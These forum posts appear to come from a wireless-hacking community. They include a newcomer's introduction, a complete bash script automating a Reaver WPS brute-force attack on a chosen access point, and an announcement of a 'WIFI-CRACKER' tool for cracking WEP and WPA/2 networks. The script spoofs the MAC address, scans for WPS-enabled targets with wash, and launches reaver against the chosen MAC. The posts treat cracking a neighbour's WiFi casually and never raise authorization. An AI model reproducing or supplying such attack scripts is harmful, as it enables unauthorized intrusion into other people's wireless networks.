Well, I haven't browsed enough to know if there is an introduction forum, but I'll go ahead and say hello here in my first post. My name is John, but I go by d1sc1ple01, obviously. I am a pretty big CS fan, and I'm getting into a decent amount of programming. I had a course on python, then c++, and now I'm teaching myself php and html5 on the side. However, like most people, hacking has always been super intriguing to me. My buddy showed me how to crack some windows passwords with bt5r3 and then we both learned how to crack wep and wpa2 wifi together. Since then, i've wanted to do more but havent had the resources. For xmas, I bought a pineapple mark iv and the reaver bundle with the alfa wifi adapter. I am of the opinion that: "the only stupid question is one you don't google first." So, I have been googling and researching a lot but these questions either can't be found or are better suited for a personal response. tl;dr - Hey! I'm new! Here's some questions: 1. Do you have any advice for how to learn any of the following more quickly than just googling and reading? an understanding of linux, a broad understanding of the tools in backtrack, how to utilize the pineapple 2. I only recently became interested in these topics, so I haven't seen many hak5 episodes. Is there a list of hak5 episodes that contain information and/or tutorials about uses for the pineapple and/or a usb wifi/adapter? 3. Do you have any general advice in regards to this field of study? 4. What other forums should I be on? Thanks for any and all information.

I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple. Just save the below to a file and execute #!/bin/bash clear echo "This script makes it easy to start a reaver attack" echo "" echo "[+] Do you need to setup a monitor interface? [y/n]" read setup if [[ $setup == 'y' ]]; then #Setup the monitor interface echo "[+] What Wireless interfaces do we have..." iwconfig echo "[+] Please select an interface to place into Monitor Mode [wlan0]" read interface if [[ $interface == '' ]]; then interface=wlan0 #Default to wlan0 fi echo "[+] Starting monitor Mode for $interface" airmon-ng start $interface iwconfig fi #End Mon Mode Setup Portion #Start part of script that executes regardless echo "[+] What monitor interface should I use? [mon0]" read monInterface if [[ $monInterface == '' ]]; then monInterface=mon0 #Default to mon0 fi #Spoof the Mon Mac echo "[+] MacSpoofing $monInterface" ifconfig $monInterface down macchanger -r $monInterface ifconfig $monInterface up #Check for Targets echo "" echo "[+] ------------------------------------------------------[+]" echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]" echo "[+] ------------------------------------------------------[+]" wash -i $monInterface #Set Reaver Target echo "[+] What is the MAC for the target AP?" read target #Set optional functions reaver #to show the options available in terminal echo "[+] reaver -i $monInterface -b $target" echo "[+] Type any other reaver options you'd like besides the above" read reaverVars #Start REAVERINGGGGG!!!! echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)" reaver -i $monInterface -b $target $reaverVars #Stop Monitor Mode Interface if the script set it up if [[ $setup == 'y' ]]; then echo "" echo "[+] killing Monitor Interface" airmon-ng stop $monInterface fi [/CODE]

You should hit update inside your WIFI-CRACKER or use the source below that has also been updated... UPDATE 3 : v1.2.3 is up and running with a couple fixes here and there since 2012... UPDATE : This is the new WIFI-CRACKER v1.2 where many things have been fixed and a few added. New functions include a updater and a packet sniffing menu. Same download link as before and you won't ever need to physically use it ever again ;) . Since this is my favorite IT show and because it inspired me to learn about wifi and write this script , I've decided that I will first post my WIFI-CRACKER script on those forums. WIFI-CRACKER is a Script that automated the hacking of wifi networks. It's completely created by me, in fact I made it today. It's a proof of concept and was created for educational purposes (since I was learning about wifi). I am planning to make it much more than cracking your neighbor's WIFI because honestly that's would be too easy for anyone on here. Currently, I want to add some more cracking options to the script as well as a DAuth menu. I'd appreciate if anyone wants to contribute on this project. Features : Mac spoofing with macchanger Target scouting with airodump-ng Cracking WEP and WPA/2 (with aircrack-ng and reaver) Debugging menu for fixing bugs Lots of small stuff to make the script as good as it can be Packet sniffing menu with tshark and wireshark *NEW* Updater function *NEW* Resume previous WPA hacking session *NEW* Fixed check_internet() Download link : Download Here Source code *UPDATED* :